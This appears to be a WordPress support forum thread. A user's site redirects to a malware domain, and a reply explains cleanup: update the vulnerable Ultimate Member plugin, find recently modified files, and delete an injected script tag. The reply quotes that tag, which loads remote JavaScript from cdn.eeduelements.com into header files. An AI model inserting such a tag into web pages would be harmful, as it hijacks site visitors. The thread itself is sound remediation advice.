Anyone who can help me how to fix my site? It is always redirecting to yetill.com. I searched about this site and i learned that it is a kind of malware. Tried various solutions found on the net but still not solved.



It seems that this is caused by the vulnerability of some plugins you might be using.

In my case it was the older version (prior to 2.22) of Ultimate Member plugin.

If you are using version 2.22 or earlier of this plugin, you should update this plugin immediately, and purge temp files. (https://wordpress.org/support/topic/malicious-files-in-ultimate-members-plugin/)

After that, search recently updated files with this command. (e.g. 15 days)

find ./ -type f -mtime -15 

Chances are your WP jquery file and any files with name "header" is likely to be infected.

/wp-includes/js/jquery/jquery.js /wp-contents/your-theme/header.php .. 

Remove the following script in your infected header files.

<script type='text/javascript' src='https://cdn.eeduelements.com/jquery.js?ver=1.0.8'></script> 

It looks like this is inserted right after opening head tag and right before closing head tag. Make sure you delete both.

Remove maliciously inserted script from infected Jquery file or just replace the file with clean one from other WP Core installations.

I think this should fix the issue.


